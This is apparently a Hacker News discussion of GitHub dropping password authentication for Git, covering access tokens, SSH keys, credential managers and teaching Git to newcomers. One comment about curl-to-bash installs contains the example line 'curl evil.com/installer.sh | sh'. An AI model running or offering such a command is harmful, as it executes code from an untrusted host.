...they are so trivial that they can be figured out in less than three hours. Mercurial can be learned in minutes. Fossil in half an hour. Even git isn't particularly difficult; you can get "working knowledge" of it by glancing at this:

https://git-send-email.io


You can learn Mercurial in three minutes if you have a background in command line administration and source control. But in a past life I have on several occasions found myself trying to train enterprises on how to use basic source control (as opposed to, say, SSHing into production systems manually and cp config.xml config.xml.bak), and failing to get the message through.


Just so folks know, you can still use personal access tokens, which basically work as per-application passwords. For someone just getting started with git, I'd recommend they go to https://github.com/settings/tokens, generate a token, and then they can just use that as their password when running `git clone`.

This will certainly be a little more difficult for newcomers, and not very discoverable, but it is there.


Right, but this is also what makes me skeptical of the whole thing. I now have a Personal Access Token saved in my password manager. When I’m in a disposable VM, and git asks for a password (because it’s a fresh, disposable VM), I copy the personal access token out of my password manager, instead of copying my Github password out of my password manager.

Okay, no big deal, I just have to spend an extra second searching for the copy password icon, since it’s not in the same place as every other account password—but did this really improve my security at all? It’s just a different password.


GitHub mentioned this in their blog-post: https://github.blog/2020-12-15-token-authentication-requirem...

> Tokens offer a number of security benefits over password-based authentication:

> - Unique – tokens are specific to GitHub and can be generated per use or per device

> - Revocable – tokens can can be individually revoked at any time without needing to update unaffected credentials

> - Limited – tokens can be narrowly scoped to allow only the access necessary for the use case

> - Random – tokens are not subject to the types of dictionary or brute force attempts that simpler passwords that you need to remember or enter regularly might be

I pretty much do the same thing, I just copy-and-paste a PAT from my password manager when I need it on VMs. The big benefit to us is that PATs are "limited", and mine only has Git repo access, so unlike my password, it can't:

- Delete repos

- Edit my GitHub organization

- Share my private repos with other users

- Add/remove SSH keys from my account

There's always the chance that a software you install on your VM would contain a keylogger (e.g. NPM/PyPI malicious libraries), so limiting the damage that your credentials can do is always a good thing.


In many cases, none of these makes a difference at all. You may have 3 apps that need the most important permission (so what if it has unnecessary access to gists, when it has and needs full access to private repos) that you use on a single computer with a password manager. Either way, you need to reset the password/key if it becomes compromised.

Still, it's good to be in the habit of doing this, because sometimes you do need it.


I would guess that "in my password manager" immediately puts you into the minority of GitHub users. (Maybe not the minority of power users or high-profile software maintainers, to be fair, but they care about security for the site in general.)

So maybe it didn't improve your security, if you were already letting your password manager generate distinct passwords, but it almost certainly improves the median user's security, who has come up with a weak password they think is strong, and may well use that password on multiple websites.

Generating the accout password instead of allowing a user-supplied password would also work here (and incentivize the use of password managers, if enough websites did it), but I would guess getting people onto SSH keys is useful for them in general - e.g., it allows them to make 2FA or CAPTCHAs mandatory for use of high-abuse-potential features like CI or Codespaces.


You're right, of course—I just resent being punished for other people's bad password choices. I wish they would turn it off by default (including changing existing accounts) and bury a checkbox deep in settings somewhere to turn it back on. Enabling the checkbox could even require that you change your Github password to something auto-generated!


Access tokens can practice least privilege and be scoped to a limited set of actions on a single repo. Your user password has whatever privileges your user has on every repo you've been given access to.


Not just whatever repo permissions your user has, critically your password has permissions to access your user account, which can do things like granting permissions to others, or changing your own security credentials.


Presumably, the token is stronger than the passwords most people are using.


They can also be revoked more easily.


Bingo. Not having to deal with the horrible passwords like to use is huge.


But you set permissions on it, right? I might be wrong but I believe the idea is that if you’re a maintainer on say Homebrew you can set up your VMs to not be able to commit towards that.


Setting up this authentication is a huge pain. First, the Github site lies to you. It tells me that, having previously generated a token, that token has never been used. It's been in use for months on one machine. Their web site and their repository system are not talking to each other.

Then they want you to generate a new token, in the "new format". Then they refuse to generate a token valid for more than a year. With a dark pattern where you push the "generate" button, but nothing happens.

Then comes dealing with Git itself. If you have a credential store file, there's no obvious way to log out of Git so that you get prompted for the new "authentication token". So I had to find out where it stores that data and delete the file. Then I could log back in with the new "authentication token". The documentation is written assuming you are using Git for the first time, not, as is more likely, updating an existing set of repositories.

(Why do I suspect that, at some point in the future, we will see "Log in with your Microsoft account?")


to be fair ms azure has a nice login experience for their cli tool (imho anyways).


Of course. Embrace, engulf, devour.


Teaching git & Github to someone that doesn't know how to use a terminal is like teaching calculus to someone that doesn't know how to add.

Of course you won't be able to do it in a couple of hours. Most people spend years learning the things that are required to understand how git works, or at least many months if you want to learn in a fast, intensive manner.


> Most people spend years learning the things that are required to understand how git works

They don't need to know how git works, they need to know how to use it.

Just like I don't need to know the details of an internal combustion engine to drive a car, someone who only does CSS work doesn't need to know how git works to push commits. A simple GUI interface suffices there.

The problem is that the official Git GUI interface is unbelievably bad and happily lets you put yourself into situations that the GUI is completely incapable of getting out of. A default GUI that can't essentially softlock itself would be fine for most casual users.


There doesn’t exist any official Git GUI. Others already mentioned GitKraken, which I think is the most noob-friendly GUI while offering pretty complete functionality.


> There doesn’t exist any official Git GUI.

There absolutely does. It's called Git GUI. It's right here: https://github.com/git/git/tree/master/git-gui


I'm a doofus, thanks for correcting.


Doesn't have anything to do with knowing the terminal or not. Before getting up and running with git just involved typing git commands. Now one of the least mysterious parts to a newb (type in your password!) involves picking an external credential store that works on your OS, and figuring out how to install it, and setting it up with your PAT, and making git talk to it. That's a long way from stuff like "now type in git add -A".


Wait what? I just use keys generated by ssh and copied to GitHub it was way more straight forward than the git commands themselves to work on a given repo.


Yeah. I start using git for personal projects in 2015 and didn’t even know about git diff until last year. All I knew was how to git add, git commit, pull and push. If anything tricky happened I just copied my changes, deleted the repo and recloned. I don’t think you need to teach git beyond those few commands to people but even then I’ve been using bash since I was a kid playing with openSuse so I’d imagine there’s a lot of bash experience that made it easier for me to pick up. I can’t imagine someone who’s never typed ls will have an easy time picking it up.


And yet I can teach TortoiseHg to CEOs and secretaries in less than an hour.

But, hey, git is sooooo superior. </s>

GitHub has done almost as much damage to version control as PowerPoint has done damage to presentations.


Most modern credential managers for git understand GitHub logins. If you copy and paste the HTTPS address for a GitHub repo (rather than the git ssh git: address) a git credential manager will give you a GitHub login dialog (classic username/password dialog with optional 2FA check) and then do the dance for you to get (and securely cache) an access token for you. No SSH key management required and the flow still feels similar (you type your username and password into the web browser wrapped as a dialog box with the GitHub logo and address).

Git for Windows and most Linux distributions of git today include such a credential manager out of the box. Generally the only thing that needs to change to move to that workflow is adjust the muscle memory to grab HTTPS addresses, not git: addresses. (Which shouldn't be an issue for new people learning it for the first time, and GitHub's own UI has worked to get better at pushing the HTTPS links first.)

ETA: A link for the main tool that provides this user flow: https://github.com/microsoft/Git-Credential-Manager-Core


GitHub Desktop, since being rewritten whenever the last time was, is pretty decent and I just have people install that to initially clone the project and set up the remotes and then they can still use the command line or IDE to make commits and pushes if they want.


I'm starting to forget normal git workflow because GitHub for windows is so damn good. It's a great user experience and they've even added some great features recently like rebasing into dev.


This.

It also has an undo button to undo the last commit which has saved my ass a couple of times.


You could just use ‘git undo’ or ‘git reset —-soft HEAD~1’.


Isn't "git undo" a very recent invention? In my experience, people don't upgrade git very often. As for your other comment, see the xkcd reference elsewhere in this thread :)


For the love of humanity, pick a better tool to teach: Mercurial. Even teaching SVN would be easier. Both interop with github just fine.

Anything but git. Git was definitely not designed for ease-of-use.

Only Linus and friends need or use 90% of git's features.


I feel that PyCharm's Git client is just as graphical/easy to use as TortoiseHg was. Version control shouldn't need the command line, it should all be pretty trees. That's the only thing I really preferred about Mercurial. I liked mq patches, but PyCharm's shelf beats the pants off them.


All this git cargo culting among software developers isn't helping. The state of version control hasn't progressed in over a decade when there is clearly room for lots of meaningful improvements. I am not even sure whether git is effectively a regression in disguise.


What can we do? Automate all of it in a nice interface that does everything for you. Make it as easy as certbot is now. Something like this, perhaps?

   $ git add-ssh-key github.com
   Checking for ssh key ... not found
   Generating ssh key for you (ssh-keygen -t rsa)... done
   Enter username for github.com: alberteinstein
   Enter account password for alberteinstein@github.com: **********
   Touch your Yubikey now: <beep>
   Uploading public key ... done
   Welcome to Github!

   $ git clone git@github.com:username/someprivaterepo


> How can we offer a more gentle learning curve for budding developers while still requiring "real" projects to use best practices for security and development

Difficult question. In the past, the solution was just not to use any of that. A bunch of files inside a random folder in your computer that were not version controlled in any way. That worked, but that's also the reason I lost most of the source code that I've written before/during university.

Version control is not a simple problem. A distributed version control system, even less simple. Git has some ergonomics issues that may possibly get improved, but the fundamental problem is not trivial.

We already have to learn so much to do the simplest of tasks, that removing password auth seems to not move the little much, if at all.

You can certainly 'postpone' some of this learning, maybe that's one route. Back when there were "IDE wars", that would be one of the arguments ("we don't have to learn no stinkin' CLI"). Some IDEs even had their own, local, "version control". At some point you'll have to "pop open the hood" though.


> In the past, the solution was just not to use any of that. A bunch of files inside a random folder in your computer

This is what my company does. Except we use git. Everyone just keeps their repo on their drive and there's no central "canonical" repository. Everyone has a personal folder in the main fileserver and they push frequently to their personal remote repo.

Any time they send emails saying they've made a notable milestone, anyone curious just merges against their remote.

The codebases somehow rarely (never) diverge catastrophically. Maybe because we're doing embedded work.


What do you release from - just whatever personal repo has all the features you need? This is interesting because you're kinda using git as the fully distributed system that it's design allows for, which isn't that common.


> What do you release from - just whatever personal repo has all the features you need?

Yep - when we need to release we just kind of merge everything into a release, compile the firmware, validate it in house and then send it to our contract manufacturer in China. "Who" does that depends on whoever is free or most closely tied to that update.


That actually sounds quite nice and quite close how Torvalds thought git would be used I guess.


Wouldn't introducing them to Github Desktop be a better first start if they are fully unfamiliar with all of the rest of the command line stuff?


Github has a really great guide for getting started here: https://docs.github.com/en/github/authenticating-to-github/c...

It probably feels really unnecessary to newcomers though. I haven’t used Github Desktop in a long time but I feel like this would be perfect for a Git client to handle. It’ll fill in the “it’s just like Dropbox but for code” mental space.


We just have to normalize it.

Passwords were useful until better alternatives were available, and are around now to satisfy authentication based on 'something you know'. As long as the necessity is to verify something you know or something you have, a private key can be more convenient.

People who prefer to enter through doors by entering a PIN instead of using a metal key will disagree.

The thing left to do is make maintaining this private key as frictionless as adding a metal key to my IRL keychain. The kids may have some good ideas :)


Pins are probably more secure than most metal keys (most locks are pickable < a minute)


> How can we offer a more gentle learning curve for budding developers while still requiring "real" projects to use best practices for security and development?

Those aren't goals that are in tension, but rather have pretty similar solutions..

The way for real projects to consistently follow the appropriate set of best practices applicable to their specific use case is for the project team to (1) identify what the appropriate practices are, (2) define workflows around them, and (3) build (or adopt existing, if available) tooling that wraps low level plumbing to implement the project workflows.

The way to offer a more gentle learning curve for budding developers is to...leave learning the details of low-level infrastructure tools for later, and to use workflow tools adapted for the project they are working on (whether its a real project or something one that is strictly pedagogical.)


You're not going to be able to avoid that ssh-keygen step.

"Pick a huge random number, this is a private key, you must never tell anybody else this key" is a fundamental operation. If they've never done this operation, that's more telling us how bad a job we did securing everything else than a problem with software development.

If the argument was, "But my users all have perfectly nice long term private keys for some other system" then we could leverage that to get keys to make GitHub work, but in reality that's not the case. SSH keys are likely the most common private key† full stop even though they're only needed to do the 21st century equivalent of telnet

† For people anyway, for machines Let's Encrypt means there are an eye-watering number of new private keys minted each day by Certbot and similar tools.


It won't always add more confusion. Some non-developers are familiar with security. For them, they might be glad to see they aren't typing their password into a program, just like they know they shouldn't be entering their password to get twitter stats.


Part of me wants to ask, why even use GitHub if you're struggling with "projects" and "ssh keys"? Just write code and run it on your machine. You can even just use git on your own machine without GitHub.

BUT, at the same time, I agree with you that the process of getting set up with GitHub is suboptimal. Have you used Heroku with git before? You run "heroku login" in the console, which then opens your browser. You sign in on the browser like normal and then the CLI magically knows who you are. You can then push and pull from heroku remotes with 0 friction. Maybe the GitHub CLI could/does have a feature like that.


I think shutting down password auth is a mistake, especially if you look at MS services and where they stand now. Authenticating against their Graph API is such a hassle that we just skipped its inclusion in some of our projects because we just don't have the dev time available for allocation.

While it is fine to require better auth, it should be in the hands of users. Otherwise adoption is severely endangered.

That said, Github is an extremely juicy target for someone trying to inject code in a lot of codebases without anyone noticing. So popular repos should certainly make use of it.


> How can we offer a more gentle learning curve for budding developers while still requiring "real" projects to use best practices for security and development?

Use literally any GUI. Alternatively, press '.'


Github Desktop I've found to be an excellent way to get people into git generally. Those with proclivities to GUI get what the need, those that like to explore have some initial guardrails.


I've been training some non-technical folks at work to make content changes (mainly markdown) and GitHub Desktop is fantastic.

We start in the browser using the built-in editing functionality and build a PR, then when they're familiar with that we progress to GitHub Desktop and VS Code.

Worked really well so far, planning on trying both Codespaces and the `.` editor next.



Let's look at the tutorial for caching git credentials, which is referenced in your first link: (https://docs.github.com/en/get-started/getting-started-with-...).

It walks you through installing a "cask" using "brew". It doesn't mention how to install homebrew but instead directs you to the homebrew homepage which shows the output of a curl command being fed to `bash -c`. Something that's both bad practice and unintelligible unless you're quite familiar with Unix shells. If everything works as intended, you're good to go! But if anything goes wrong, or you have to update the "cask" in the future you're left with little to no context about what you just did.

For someone unfamiliar with Unix shell commands, homebrew, curl, etc. this is a quagmire that can take days to unravel without someone there to help them.


Piping the output of curl to bash is not "bad practice" any more that downloading an application from your browser and clicking on it or downloading a distro CD/USB image and booting it up "bad practice."

You have to trust the place where you're downloading it from, of course. But there's nothing inherently worse about /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/inst...)" than burning https://cdimage.debian.org/debian-cd/current/amd64/iso-cd/de... and booting it up.


Why the downvotes on the parent? It's literally the same thing: running random code from the internet on your computer!


You can actually detect from the server side if curl is being piped and dynamically change the payload.


Yes! I'm not sure how that changes what I'm saying. If you don't trust the server, it can give you a malicious ISO, too.

Or are you saying that you audit the bits of the ISO yourself before burning it?


Woah. How? Assume scrubber request headers.


latency/buffer size/stalling effects. It's the difference between `curl evil.com/installer.sh | sh` and `curl evil.com/installer.sh | cat > installer.sh`.


We're taking a 1:1 approach, but most of the time I take issue with the language used in many guides. The linked guides are good examples, they contain a whole load of terms and buzzwords you don't need to know as a beginner.


I don't think newcomers use this anyway; usually you start off setting up git with ssh key-based authentication, not password-based.

That's exactly why git is a bit of a pain to initially set up.


The GitHub CLI could present an option to automatically call ssh-keygen and add the key to your account when you sign in from a device that doesn't have keys yet


Why are we always teaching Git in the context of GitHub though? There HSA to be a simpler, more platform agnostic way.


Warning, snarky opinion ahead: because git has terrible cli operations that only make sense to people who under reflog and rebase and the underpinnings of git as opposed to any sort of file-based operations, which is how most people understand computers.

Github looks and behaves like a filesystem with a timeline, which is not accurate to how git works functionally, but that's what makes sense to most people out of the box


Sure, but churning out students on a singular, closed-source, megacorp-owned platform isn't the right thing to do either.


This is a great question and one that I have been asking for quite some time. Many tutorials and guides make the mistake of conflating git with GitHub to the point that many new learners think GitHub is git.

When I teach git, I make it very clear that GitHub is one of many services you could use. For our purposes, we're using it because GitHub is quite popular and is a familiar place to look when interviewing with a potential employer. But I stress that there are other options (eg. I host my own instance of Gitea).


Are you teaching a junior at work? What's the context?


In this case it is a younger college student who's interested in web development but hasn't done any CS learning and isn't generally familiar with tech.


Does someone who just wants to experiment with a little bit of web-dev really need to have version control right away? Seems a bit out of scope. That seems like a concept that can wait a few months while they actually just explore writing some code first.


> Does someone who just wants to experiment with a little bit of web-dev really need to have version control right away?

To explain: She wants to eventually work as a developer and has a project in mind guiding her. I started her with the simplest possible steps and she's been learning html & css for a few weeks now with some great progress. She got the the point where she was starting to have multiple projects she was building for learning. In addition, she was starting to feel the pain of "this project is on my desktop, but I am going to be away from home for a week and will only have my laptop." For those reasons (as well as the benefit of introducing GitHub as a place of collaboration), we took some a few hours to cover git and the terminal.

It didn't seem like we jumped to it too early and after those three hours she had the basics which is good enough to ensure her projects are safely replicated to GitHub and available for her no matter which machine she is on.


If the person learning just wants to write some HTML in a file and put that on a server somewhere as the index.html file then maybe version control is overkill.

But, if this person's goal is about creating a web application then version control is a good skill to have. I remember the days when source code for a web application was something we could zip up and hand to a client. But, these days, more than likely you have a remote server somewhere and you need to SSH into it and from there you could SFTP the files but at that point why not just use git and it's branch management. Obviously, there are more arguments that can be made for learning git.


Totally agree on this. So many coding (or even data science) courses start with Git which is just not that important for a newbie.


In the context of learning at work, there's a good chance they'll be trying to make some minor changes in an existing project, instead of doing something from scratch. For that they need to interact with the CVS.


or start with svn or something simpler to get the basics of source control.


SVN was the reason most people when I was in college didn't use source control at all. It was painful to install on Windows. There weren't good hosts for it. (CSV at least had bad old SourceForge.) Once you had it installed and had settled on a host computer (and SVN needs a host), configuring your repositories in it was a whole new mess. SVN is definitely not "simpler".

With git you can install and git init anywhere and go you have source control. Moving commits to another machine gets us into the complications way above of learning GitHub and tools for GitHub, but in terms of 0-60 on "start a repository so you can commit changes" it's really hard to beat.


Why do we need a more gentle learning curve? Let them figure it out as everyone else did. There's more than enough information online.


Development doesn't have tk be hard or confusing. A large amount of the complexity that is introduced is wholly unnecessary. Why wouldn't we want to make it easier for people to learn things?


Fifficult indeed


Ok I'll admit it. I'm the dingus who is still using https and login/password. It's how I learned to use it years ago and since I only ever access GitHub via cli it's all I've ever learned. I don't program anything complex and I've never put anything secure up on GitHub (it's public, after all, so i had the expectation that all info on there is insecure). I don't understand why this is being deprecated when it's the default suggestion GitHub provides you when you add a new repo to your profile so that you can connect your local git repo to it. For hosting my trivial personal projects it seems so silly to have to go onto github's web interface and click through a bunch of their ui to build a personal passkey(which is just a password with a different name afaict). Am I just not the intended audience for the change or am I missing something crucial that doesn't make this seem like a bunch of extra effort for no meaningful change?


You forgot about the part where you run `git push` later and realize it didn't save your passkey, so you have to make another one. This time you Google how to save it and copy the top answer on StackOverflow, which uses the git credentials store to save it in plain text in your ~/.gitconfig file. Now is the passkey more secure?


That seems more like a problem with StackOverflow than anything else.


Yeah I would just edit that answer to add a big warning at the top.


> it's public, after all, so i had the expectation that all info on there is insecure

I think it's a misconception.

Unless you just let everyone write anything in your repo, one would expect that what is there is what it says on the tin.

Every public software project takes measures to stay authentic and not let random and unreviewed, potentially malicious bits in. This is how they keep their users' trust.

Very roughly, "public" = read access is unrestricted, and "insecure" = write access is unrestricted.


I'm also a dingus and I am sometimes forced to clone private repos to new machines which doesn't have my keys. I know that ssh-agent is a thing which is sometimes set up but I still don't really know how it works, and sometimes it doesn't work at all with weird proxy servers and whatnot.

I wish there was some way of _manually_ identifying via a simple link or QR code or whatever.


> I don't understand why this is being deprecated when it's the default suggestion GitHub provides you when you add a new repo to your profile so that you can connect your local git repo to it.

It suggests SSH commands by default for me, I assume this depends whether you have added an SSH key to your account or not.


You can use a supporting Git Credential Manager (such as GCM Core: https://github.com/microsoft/Git-Credential-Manager-Core) to keep using HTTPS and login/password. Instead of typing in your username/password directly in the CLI, it pops up GitHub's login page where you input login/password and then does the dance for you to get an access token from that.

(Git for Windows default installs GCM Core. Some Linux distros do to. You may even already be using it. I think I've seen some confusion in comments here and elsewhere that they don't realize they are already typing in their username/password to a GCM dialog and that's going to keep working. This is about removing HTTPS Digest auth with direct password transmission over the wire.)


Wait til you work in a corporate environment where core doesn't work but the original GCM does. They bungled that transition.


Have you filed an issue on it? We'd be happy to investigate. https://github.com/microsoft/Git-Credential-Manager-Core/iss...


That sounds painful, and in having my own share of dumb corporate papercuts in my environment I sympathize. I'd also point out and echo the sibling comment that the few times I've had GCM problems, the GitHub Issues have helped me debug and fix it (either having an existing Issue with enough details to correct it myself or responding quickly when I've needed to post something).


Thank you for being humble and describing the ways you use GitHub!

I'm the same, and it's reassuring to know that I'm not the only one just using it as a free web host for personal projects.

Until starting a new job in January 2021, I "knew git" to the extent of git pull, git add, git commit -m, and git push. For everything else I just made a copy of the repo. Now I've learned a little more about branches and merge requests, but I still make a copy of the repo and copy my changes over when things go wrong. https://xkcd.com/1597/

Like you, I got some password-related warnings on GitHub, and honestly it's scaring me away. I know it'll take an hour or so to figure out what went wrong, regenerate a ton of SSH keys for every computer I own and link them to my account, disable 2FA because my phone number is in another country... I'd rather just upload a file, thanks.

The increased overhead means I'd rather just use FTP to upload some files to an HTTP server, but I don't think that such free FTP web hosts exist any more. At least, not ones with a domain that people recognise. That said, peterburk.github.com is no longer accessible, only peterburk.github.io, so maybe it is time for me to go looking for a free .com subdomain.

I'm grateful for GitHub hosting all the junk I decide to share, and I'm obviously not their target market if I'm not paying. I just wish there were a place I could drag & drop to upload content publicly.


> regenerate a ton of SSH keys for every computer I own and link them to my account

You could do a single one per computer. You could even do a shared single one across all computers (it’s recommended against but not strictly worse than a shared password)

> disable 2FA because my phone number is in another country

Don’t use SMS for 2FA. Use TOTP (Google Authenticator or similar app. There are alternatives that let you sync) or U2F (hardware key)


You can switch to bitbucket, they still support passwords.


I was in the same boat until recently. There have even been a couple of projects I got invited to that I never could join because of this (since multi-factor doesn't work with terminal username/password).

I've tried setting up SSH keys many times and have somehow failed many times. The UX for security stuff just isn't there. I finally have gotten a workflow sort-of figured out and documented to remind myself in the future.


Key based auth is much more resistant to phishing. Its just one command to have openssh generate a key pair on your computer, and you're done. Password auth in general cannot go away fast enough.


Not in Windows unless you have WOL installed.


I'm using Windows and git with ssh keys and haven't managed to install WOL.

What you need is to install Git for Windows. It will include ssh-keygen (if it's not already there) and you can do the usual dance.


Windows comes with ssh by default these days so you can easily ssh-keygen. Doesn't need WOL as I used that without WOL.


Isn't the annoyance of having to type your password enough to prod you to use SSH?


Disclosure: I'm the Git Systems PM at GitHub. Opinions are my own and I wasn't directly involved with this effort.

GCM Core is a really straightforward way to auth with GitHub and several other Git hosts. It comes with Git for Windows by default, can be installed with `brew` on macOS, and from a .deb on Linux. https://github.com/microsoft/Git-Credential-Manager-Core (it started under the Microsoft banner but is maintained by GitHub employees now).


GCM still doesn't support multiple users properly, though. Https auth is what I was using for a second GitHub account, so I'm not thrilled about this change.

I want to have work and personal GitHub accounts on the same machine and very explicitly choose which account goes to which repo. Too often I have changes going in with the wrong user.name / user.email or account to the point where I paranoidly reauthenticate every time and manually check each clone's .git/config.


I think you can achieve this with an SSH config like

  Host github-personal
  HostName github.com
  IdentityFile ~/.ssh/id_rsa_personal

  Host github-work
  HostName github.com
  IdentityFile ~/.ssh/id_rsa_work

Then you can use `github-work` or `github-personal` in the remote URL like `git clone git@github-work:mywork/somerepo.git`.

edit: I realized after reading the other comments that I got the problem wrong! This would push the commits from the correct GitHub account but the commits would still have the e-mail from git's config and GitHub would link the account in the committer e-mail.


> This would push the commits from the correct GitHub account but the commits would still have the e-mail from git's config and GitHub would link the account in the committer e-mail.

That seems like a situation where you'd `git config user.email` within your work repo(s) so that it's set locally, not globally. I also think GitHub primarily supports and envisions people using one GH account for work and personal projects.


While this probably doesn’t completely solve your problem, have you tried using conditional includes in your .gitconfig? I’ve been using that to ensure that anything under ~/work uses my work email for user.email, but anything under ~/projects uses my personal email. It’s quite handy.

https://git-scm.com/docs/git-config#_conditional_includes


Oh wow that is genius! I had no idea this existed, thanks!


We recently added support for multiple identities but it's not complete (or seemingly documented, oops). I'll take a note to look into fixing and extending it.

Edit: but also, GCM Core has nothing to do with the user.email/user.name in .gitconfig. I have a similar problem where I want some commits written with my work email and others with my personal, and I always forget to check it when starting in a new repo. I push them both using a single GitHub identity, though, so your situation has an extra wrinkle.


Don't know if you'll see this now that it's been a few hours, but for anyone trying to work with multiple distinct GitHub identities: GCM Core will read the user part of a URL and use it if provided. There's an "ambient" or "default" user for URLs which don't include a user part, which is the only thing most people use. If I wanted to be really specific to use my `vtbassmatt` identity, I'd write:

    git clone https://vtbassmatt@github.com/WorkOrg/work-repo.git
I manually added the "vtbassmatt@" to tell Git to tell GCM Core that that's who I want to log in as.

(Here's where I could tell you about all the ways in which the credential manager system in Git is deficient... I'll spare you, though, and simply say that this is close to the best we can do without a whole other layer of artifice that you probably wouldn't like.)


You can use includeIf in your gitconfig to set different email defaults based on directory prefix. So keep your personal projects grouped in a personal directory and you don't have to do anything special for each project


GCM Core does support multiple users with GitHub remotes. You have to put the username in the remote URL, for example:

https://alice@github.com/owner/repo

GCM will store credentials for "alice" only. Repositories that have remote URLs with a different "user@" will use different credentials.

Remote URLs without a "user@" part at all (like "https://github.com/owner/repo") are treated like the "default" user for GitHub.com, rather than a specific one.


Can't you still use https with this? You use the personal account token for the specific account to log in as the "password". I've been doing this recently with two GitHub accounts.

In my ~/.gitconfig file, I've included

    [credential "https://github.com"]
        useHttpPath = true
Which means that the first time -- and only the first time -- I try to do something with a GitHub repo that requires authentication, I'll be asked for the username and password (token), and I make sure to use the right one. :) At that point things stay set.


I just last night had the idea to put a global git config alias for the `clone` command... Such that it would (1) be preceded by asking me which email I want to use, (2) do the clone, then (3) do `git config user.email bogus@whatever.tld`.

Went to bed early rather than finish that, and this just reminded me of it... (offhand, I wouldn't be surprised if my alias has to be something other than `clone`, but no biggie if so)


Are you open to using a tool like direnv to manage env vars on a directory-wide basis? I used to also suffer from the same paranoia, but direnv has allowed me to take back control regarding directory-specific configuration.

You can configure it to set your git user name/email based on your working directory, for example. This is how I keep the separation you mentioned between personal and work on the same machine


Would something like that exist on Windows?

Also, it doesn't seem to solve the problem of multiple accounts; I more or less accepted I need to manually configure user.name and user.email for each clone, but the account is not part of the same config, it looks like it's stored in some other ephemeral place - maybe GCM Core, or some Credential Manager or who knows.

I only realize it was using the wrong account when I try to push and get some unauthorized error; by that point, my commit log is polluted with the wrong account so I need to do some gymnastics where I reset the authentication, manually copy over files or unstage to purge the metadata, etc.


I have gladly forgotten the details by now but last time I developed on Windows GCM was the thing that gave me the most headaches. Our Git was on Azure DevOps (whatever that's called now) not github. Due to reasons we could not use SSH instead.


Hopefully they'll enhance the other authentication methods. I was quite surprised how complicated yet insecure the GitHub Actions and personal access token mechanisms are just last week.

GitHub Actions tokens are scoped to the single repo they operate in, so for anything that you need covering any cross-repository or org access the official docs immediately tell you to just use a PAT instead. But PATs have no repository scoping whatsoever, it's all or nothing. So although both PATs and GHA Tokens have these complex scope requests, it's completely missing the most basic use cases in my opinion, like creating a PR in repo X, allow installing a package from GitHub Packages in repo Y, check out code from repo Z etc. You either go full mono-repo for everything, or you use PATs for everything with no repository boundaries at all, yikes.


Yeah .. it's not great. Creating a machine user is really the only way to do it right now :(.


And they'll charge you the full seat price for it :/


GitLab now has project access tokens for that.


If you have a "project" not a "user". If I'd known this in the past I would have just created a "kevincox" project and a "kevincox-u" user.


The scoping of pat currently are terrible. If I want a read only access token, the user needs to be read only, if I went write, user needs write permissions. This means I need 2 users


You could always use "Deploy keys" which are per-repo read-only SSH keys. You could set up multiple repos with the same deploy key and use the private key in GitHub Actions secrets.


This won't work as a deploy key can only be used in one repo.


The same key can be copied over to any number of repos you want, unless I'm missing something from the GitHub docs


The current suggested solution is to create a new user just for that repo and create a PAT in that user. So the PAT will only have access to that repo.


tldr Git SSH protocol will still support authentication via username:password but in this case, the "password" can no longer be your Github Account password, but it can be a Personal Access Token.

So no need to panic if you've been using a build system or other tool that authenticates with username:token instead of a SSH key.


This change affects HTTPS access, not SSH.


https://github.blog/2020-12-15-token-authentication-requirem...

Workflows affected:

* Command line Git access

* Desktop applications using Git (GitHub Desktop is unaffected)

* Any apps/services that access Git repositories on GitHub.com directly using your password


Which one of those is non-HTTPS?


git@github.com:org/repo where you've set it up to use username:password

People who've put this information in a netrc file may see downstream issues in several applications which auth with info found therein


TLDR? The article was three sentences!


Well, the comment was two :D


So now I can't use git client on github repos anymore without carrying a device that has some impossible to memorize key or token on it?

I hate it. I don't care much for the slight chance that someone gets into my github account. I care a lot more that now I have to jump hoops to get into my account myself. There's more to things than security.


You can use Access Tokens which are "application specific" passwords instead of SSH keys.

You can use a git credential manager such as GCM Core (https://github.com/microsoft/Git-Credential-Manager-Core) to automate the flow from username/password to access token. (It pops up a browser window where you login, retrieves and access token for you.)


Sounds a lot like a hoop. With password I can use any device with git installed to pull and push from/to github repos. Now I'd need a hack like this on top.

I prefer less tools to more tools. Probably a losing battle given how the field is developing.


GCM Core is installed out of the box with official git installer on Windows. Several Linux distributions at this point include it as well. On macOS it is a simple brew install away.

git itself was built as an agglomeration of multiple tools bundled together and GCM Core is right on the borderline of a tool always included in the git distribution anyway on some platforms and needs to be installed on others. It's likely to always be in that "weird border space" because it requires a web browser and there isn't a pure command line equivalent.


So if I SSH into a machine, no management for me. And it doesn't seem to be in APT at least in Debian unstable. And even if it is, it is still another tool, subject to breakage and with heavy dependencies. Also not very eager to install some .NET runtime just to have some hack to pop up a browser.

Sorry, but I still hate it. I want less software, not more.


I suppose someone could make an SSH key generator/agent that derives the key from a user-selectable passphrase. Probably nobody would package it as conveniently as using a password with standard git was, though.


I wonder how many old, forgotten systems there are out there that pull from Github with a password. Brownouts are a smart way to try and weed those out, but there are going to be residual requests. I wonder how many.


Looks like they've been doing them for about a year, but stragglers are a guarantee!


For any Githubbers reading, my coworker was apparently affected by a brownout window and changed to using a personal access token. He didn't know it at the time but I just mentioned the period and it lines up with when had issues with his authentication. Seems like the brownout was a success in our case!


Similar here, though we did narrow it down to the cause/brownout at the time.


When will we get repo-specific tokens? That's what I really want. As-is, I've just created extra special purpose github accounts, but that's a bad solution IMO.



Huh, yeah I actually forgot about them, I have used them in the past. It would still be nice to be able to make repo-specific tokens though.


Can you use deploy keys to auth with the api?


I'm guessing that if that's gonna happen (cmon, it's gotta) they view this migration as a pre-requisite


> they view this migration as a pre-requisite

It's hard to picture how it could be.


I'm guessing that if that's gonna happen (cmon, it's gotta) they view this migration is a pre-requisite


I feel a great disturbance in the force... As if millions of CI jobs suddenly cried out in terror, and were suddenly silenced.


For those of you who are saying you don't really "know" git, your VCS will be so so much less stressful if you take a day or so to learn it! I can't recommend this site enough for familiarity with the basics: https://learngitbranching.js.org/


The news is not actually about git, it is about GitHub. Maybe they should make it more explicit in the title.

Git still supports password authentication, as well as many other protocols. GitHub chose to restrict which protocols and authentication schemes are allowed on its platform.

But obviously, learning about the tools you are using is always a good idea.

My preferred "tutorial" is this one: https://codewords.recurse.com/issues/two/git-from-the-inside...

It is more advanced than the usual introductions but it demystifies most of the git concepts.


I know, but a lot of discussion ended up being about git with people saying they didn't "get" it (heh), hence the link.


I use TortoiseGit under Windows. It took me 3 days (on and off) to figure out how to push code to my repositories again. The amount of misleadng and confusing information on the internet is extraordinary.

